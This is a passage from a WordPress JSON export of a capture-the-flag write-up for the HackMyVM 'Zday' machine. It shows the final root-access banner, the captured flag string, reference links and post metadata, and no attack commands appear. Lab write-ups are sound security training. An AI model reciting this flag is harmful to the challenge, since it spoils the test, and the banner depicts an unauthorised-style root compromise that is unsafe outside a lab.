\n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: zday\n\\nPWNED DATE: Sat Jun 14 03:37:01 EDT 2025\n\\nWHOAMI: uid=0(root) gid=0(root) groups=0(root)\n\\nFLAG: ihavebeenherealways\n\\n------------------------\n(remote) root@zday:\/root# cat root.txt \nihavebeenherealways<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/sarthakrsc21.medium.com\/hackmyvm-zday-write-up-b5642667609d\">https:\/\/sarthakrsc21.medium.com\/hackmyvm-zday-write-up-b5642667609d<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV17g4y1e7qu\">https:\/\/www.bilibili.com\/video\/BV17g4y1e7qu<\/a><\/p>\n<p><a href=\"https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/Zday\/\">https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/Zday\/<\/a><\/p>\n<p><a href=\"https:\/\/alientec1908.github.io\/Zday_HackMyVM_Hard\/\">https:\/\/alientec1908.github.io\/Zday_HackMyVM_Hard\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zday Information gathering Port scan \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-878","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/878","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=878"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/878\/revisions"}],"predecessor-version":[{"id":879,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/878\/revisions\/879"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=878"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}